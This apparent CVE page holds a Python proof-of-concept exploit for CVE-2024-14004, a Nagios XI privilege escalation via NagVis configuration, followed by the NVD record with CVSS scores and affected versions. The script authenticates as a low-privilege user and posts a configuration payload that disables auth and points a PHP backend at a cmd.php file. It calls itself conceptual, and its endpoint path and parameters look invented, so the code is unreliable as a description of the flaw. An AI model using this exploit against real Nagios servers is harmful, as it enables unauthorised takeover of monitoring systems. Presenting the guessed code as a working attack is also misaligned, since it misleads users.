CVE-2024-14004

#!/usr/bin/env python3 """ CVE-2024-14004 PoC - Nagios XI NagVis Configuration Privilege Escalation Note: This is a conceptual PoC for educational and security testing purposes only. Author: Security Researcher Reference: https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-nagvis-configuration """ import requests import json import sys from urllib.parse import urljoin class CVE202414004Exploit: def __init__(self, target_url, username, password): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.session = requests.Session() self.auth_token = None def authenticate(self): """Authenticate to Nagios XI with low-privilege account""" login_url = f"{self.target_url}/nagiosxi/login.php" login_data = { 'username': self.username, 'password': self.password, 'loginButton': 'Login' } try: response = self.session.post(login_url, data=login_data, timeout=30) if response.status_code == 200 and 'nagiosxi' in response.url: print(f"[+] Successfully authenticated as {self.username}") return True print("[-] Authentication failed") return False except requests.RequestException as e: print(f"[-] Connection error: {e}") return False def exploit_nagvis_config(self): """ Exploit NagVis configuration manipulation for privilege escalation This PoC demonstrates the configuration injection technique """ # Target NagVis configuration API endpoint nagvis_api = f"{self.target_url}/nagiosxi/includes/components/nagvis/class NagVisConfig.php" # Malicious configuration payload # Note: Actual exploitation requires specific parameter manipulation payload = { 'action': 'update', 'map_name': 'test_map', 'config_params': { 'backend': 'php', 'php_file': '/var/www/html/nagiosxi/scripts/cmd.php', 'auth_enabled': '0' } } print("[*] Attempting NagVis configuration manipulation...") print(f"[*] Target: {nagvis_api}") print(f"[*] Payload: {json.dumps(payload)}") try: response = self.session.post( nagvis_api, json=payload, headers={'Content-Type': 'application/json'}, timeout=30 ) if response.status_code == 200: print(f"[+] Configuration manipulation request sent") print("[*] Check if PHP code execution is achieved via config injection") return True return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False def check_vulnerability(self): """Check if target is vulnerable""" check_url = f"{self.target_url}/nagvis/index.php" try: response = self.session.get(check_url, timeout=30) if 'NagVis' in response.text: print(f"[+] NagVis component detected on target") return True return False except requests.RequestException: return False def main(): if len(sys.argv) < 4: print(f"Usage: python3 {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python3 {sys.argv[0]} http://192.168.1.100/nagiosxi admin password123") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] exploit = CVE202414004Exploit(target, username, password) print("="*60) print("CVE-2024-14004 PoC - Nagios XI NagVis Privilege Escalation") print("="*60) if exploit.check_vulnerability(): print("[+] Target appears to be running NagVis") if exploit.authenticate(): exploit.exploit_nagvis_config() print("[*] Exploitation attempt completed") print("[*] Manual verification required for privilege escalation") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2024-14004", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:45.877", "lastModified": "2025-11-06T16:08:49.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.2 contain a privilege escalation vulnerability related to NagVis configuration handling (nagvis.conf). An authenticated user could manipulate NagVis configuration data or leverage insufficiently validated configuration settings to obtain elevated privileges on the Nagios XI system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.2:*:*:*:*:*:*", "matchCriteriaId": "A1FDA3F3-DF79-4807-9451-F04B2DB9A2B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.3:*:*:*:*:*:*", "matchCriteriaId": "9E055065-35A7-458A-A2DB-26634B97EE7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.4:*:*:*:*:*:*", "matchCriteriaId": "76946B2D-093C-4981-8465-5ADBB98C0676"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.5:*:*:*:*:*:*", "matchCriteriaId": "E9112876-7C61-4A72-8F91-023378E82E6D"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-privilege-escalation-via-nagvis-configuration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}